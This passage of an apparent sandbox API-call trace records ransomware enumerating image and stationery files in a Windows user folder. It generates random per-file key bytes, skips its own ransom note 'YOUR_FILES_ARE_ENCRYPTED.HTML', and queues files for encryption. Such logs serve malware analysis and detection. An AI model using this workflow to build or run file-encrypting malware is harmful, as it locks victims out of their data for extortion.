(pszPath="Hand Prints.htm") returned=".htm" [0163.789] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.789] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0163.789] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=235) returned 1 [0163.789] CloseHandle (hObject=0x5b0) returned 1 [0163.789] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x827f32dc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x107e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HandPrints.jpg", cAlternateFileName="HANDPR~1.JPG")) returned 1 [0163.789] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 86 [0163.790] lstrcmpW (lpString1="HandPrints.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.790] PathFindExtensionW (pszPath="HandPrints.jpg") returned=".jpg" [0163.790] lstrlenW (lpString=".jpg") returned 4 [0163.790] PathFindExtensionW (pszPath="HandPrints.jpg") returned=".jpg" [0163.790] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0163.790] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=4222) returned 1 [0163.790] GetProcessHeap () returned 0x270000 [0163.790] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0163.792] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="3E") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="7E") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="CE") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="F8") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="89") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="0A") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="E3") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="8C") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="D6") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="56") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="08") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="64") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="B1") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="32") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="0B") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="D9") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="C2") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | 
out: param_1="09") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="8C") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="DC") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="90") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="AB") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="A4") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="D2") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="B0") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="77") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="39") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="7B") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="34") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="8B") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="FC") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="45") returned 2 [0163.794] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" [0163.794] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.794] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) 
returned 1 [0163.794] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41f57aa4, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Orange Circles.htm", cAlternateFileName="ORANGE~1.HTM")) returned 1 [0163.794] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 90 [0163.794] lstrcmpW (lpString1="Orange Circles.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.794] PathFindExtensionW (pszPath="Orange Circles.htm") returned=".htm" [0163.794] lstrlenW (lpString=".htm") returned 4 [0163.794] PathFindExtensionW (pszPath="Orange Circles.htm") returned=".htm" [0163.794] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0163.794] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=237) returned 1 [0163.794] CloseHandle (hObject=0x5ac) returned 1 [0163.795] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8283f59c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="OrangeCircles.jpg", cAlternateFileName="ORANGE~1.JPG")) returned 1 [0163.795] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 89 [0163.795] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.795] PathFindExtensionW (pszPath="OrangeCircles.jpg") returned=".jpg" [0163.795] lstrlenW (lpString=".jpg") returned 4 [0163.795] PathFindExtensionW (pszPath="OrangeCircles.jpg") returned=".jpg" [0163.795] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0163.795] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=6381) returned 1 [0163.795] GetProcessHeap () returned 0x270000 [0163.795] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a170 [0163.799] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="94") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="1D") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="E0") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="A2") returned 2 
[0163.799] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="A1") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="CD") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="6B") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="34") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="79") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="4D") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="1D") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="C3") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="03") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="64") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="FF") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="79") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="6E") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="5D") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="29") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="76") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="47") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="EE") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="63") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="81") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="94") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: 
param_1="85") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="A6") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="F0") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="6E") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="A1") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="1C") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="3A") returned 2 [0163.801] lstrcpyW (in: lpString1=0x751a224, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" [0163.801] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x750a170, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.801] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a170, lpOverlapped=0x750a170) returned 1 [0163.801] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41fa3d64, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Peacock.htm", cAlternateFileName="")) returned 1 [0163.801] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 83 
[0163.801] lstrcmpW (lpString1="Peacock.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.801] PathFindExtensionW (pszPath="Peacock.htm") returned=".htm" [0163.801] lstrlenW (lpString=".htm") returned 4 [0163.801] PathFindExtensionW (pszPath="Peacock.htm") returned=".htm" [0163.801] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0163.801] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=232) returned 1 [0163.801] CloseHandle (hObject=0x5b4) returned 1 [0163.801] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x828d7b1c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Peacock.jpg", cAlternateFileName="")) returned 1 [0163.802] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 83 [0163.802] lstrcmpW (lpString1="Peacock.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.802] PathFindExtensionW (pszPath="Peacock.jpg") returned=".jpg" [0163.802] lstrlenW (lpString=".jpg") returned 4 [0163.802] PathFindExtensionW (pszPath="Peacock.jpg") returned=".jpg" [0163.802] 
SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0163.802] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=5115) returned 1 [0163.802] GetProcessHeap () returned 0x270000 [0163.802] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75322c8 [0163.806] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="BA") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="D8") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="66") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="40") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="82") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="EC") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="7D") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="40") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="08") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="A1") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="A1") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="99") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="32") returned 2 [0163.807] wsprintfW (in: 
param_1=0x4ebd146, param_2="%02X" | out: param_1="59") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="76") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="6E") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="7A") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="DF") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="81") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="C5") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="27") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="89") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="DB") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="8F") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="59") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="42") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="20") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="A5") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="93") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="46") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="16") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="03") returned 2 [0163.808] lstrcpyW (in: lpString1=0x754237c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" [0163.808] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x75322c8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.808] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75322c8, lpOverlapped=0x75322c8) returned 1 [0163.808] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd263de50, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd263de50, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41ff0024, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roses.htm", cAlternateFileName="")) returned 1 [0163.808] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 81 [0163.808] lstrcmpW (lpString1="Roses.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.808] PathFindExtensionW (pszPath="Roses.htm") returned=".htm" [0163.808] lstrlenW (lpString=".htm") returned 4 [0163.808] PathFindExtensionW (pszPath="Roses.htm") returned=".htm" [0163.808] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0163.809] GetFileSizeEx (in: hFile=0x590, 
lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=233) returned 1 [0163.809] CloseHandle (hObject=0x590) returned 1 [0163.809] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x828fdc7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roses.jpg", cAlternateFileName="")) returned 1 [0163.809] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 81 [0163.809] lstrcmpW (lpString1="Roses.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.809] PathFindExtensionW (pszPath="Roses.jpg") returned=".jpg" [0163.809] lstrlenW (lpString=".jpg") returned 4 [0163.809] PathFindExtensionW (pszPath="Roses.jpg") returned=".jpg" [0163.809] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0163.809] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=1920) returned 1 [0163.809] GetProcessHeap () returned 0x270000 [0163.809] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a420 [0163.813] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="49") returned 2 [0163.813] 
wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="DA") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="A0") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="B1") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="F5") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="CC") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="0C") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="97") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="DE") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="54") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="D6") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="46") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="10") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="42") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="24") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="F4") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="AD") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="C7") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="4D") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="E8") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="53") returned 2 [0163.813] wsprintfW (in: 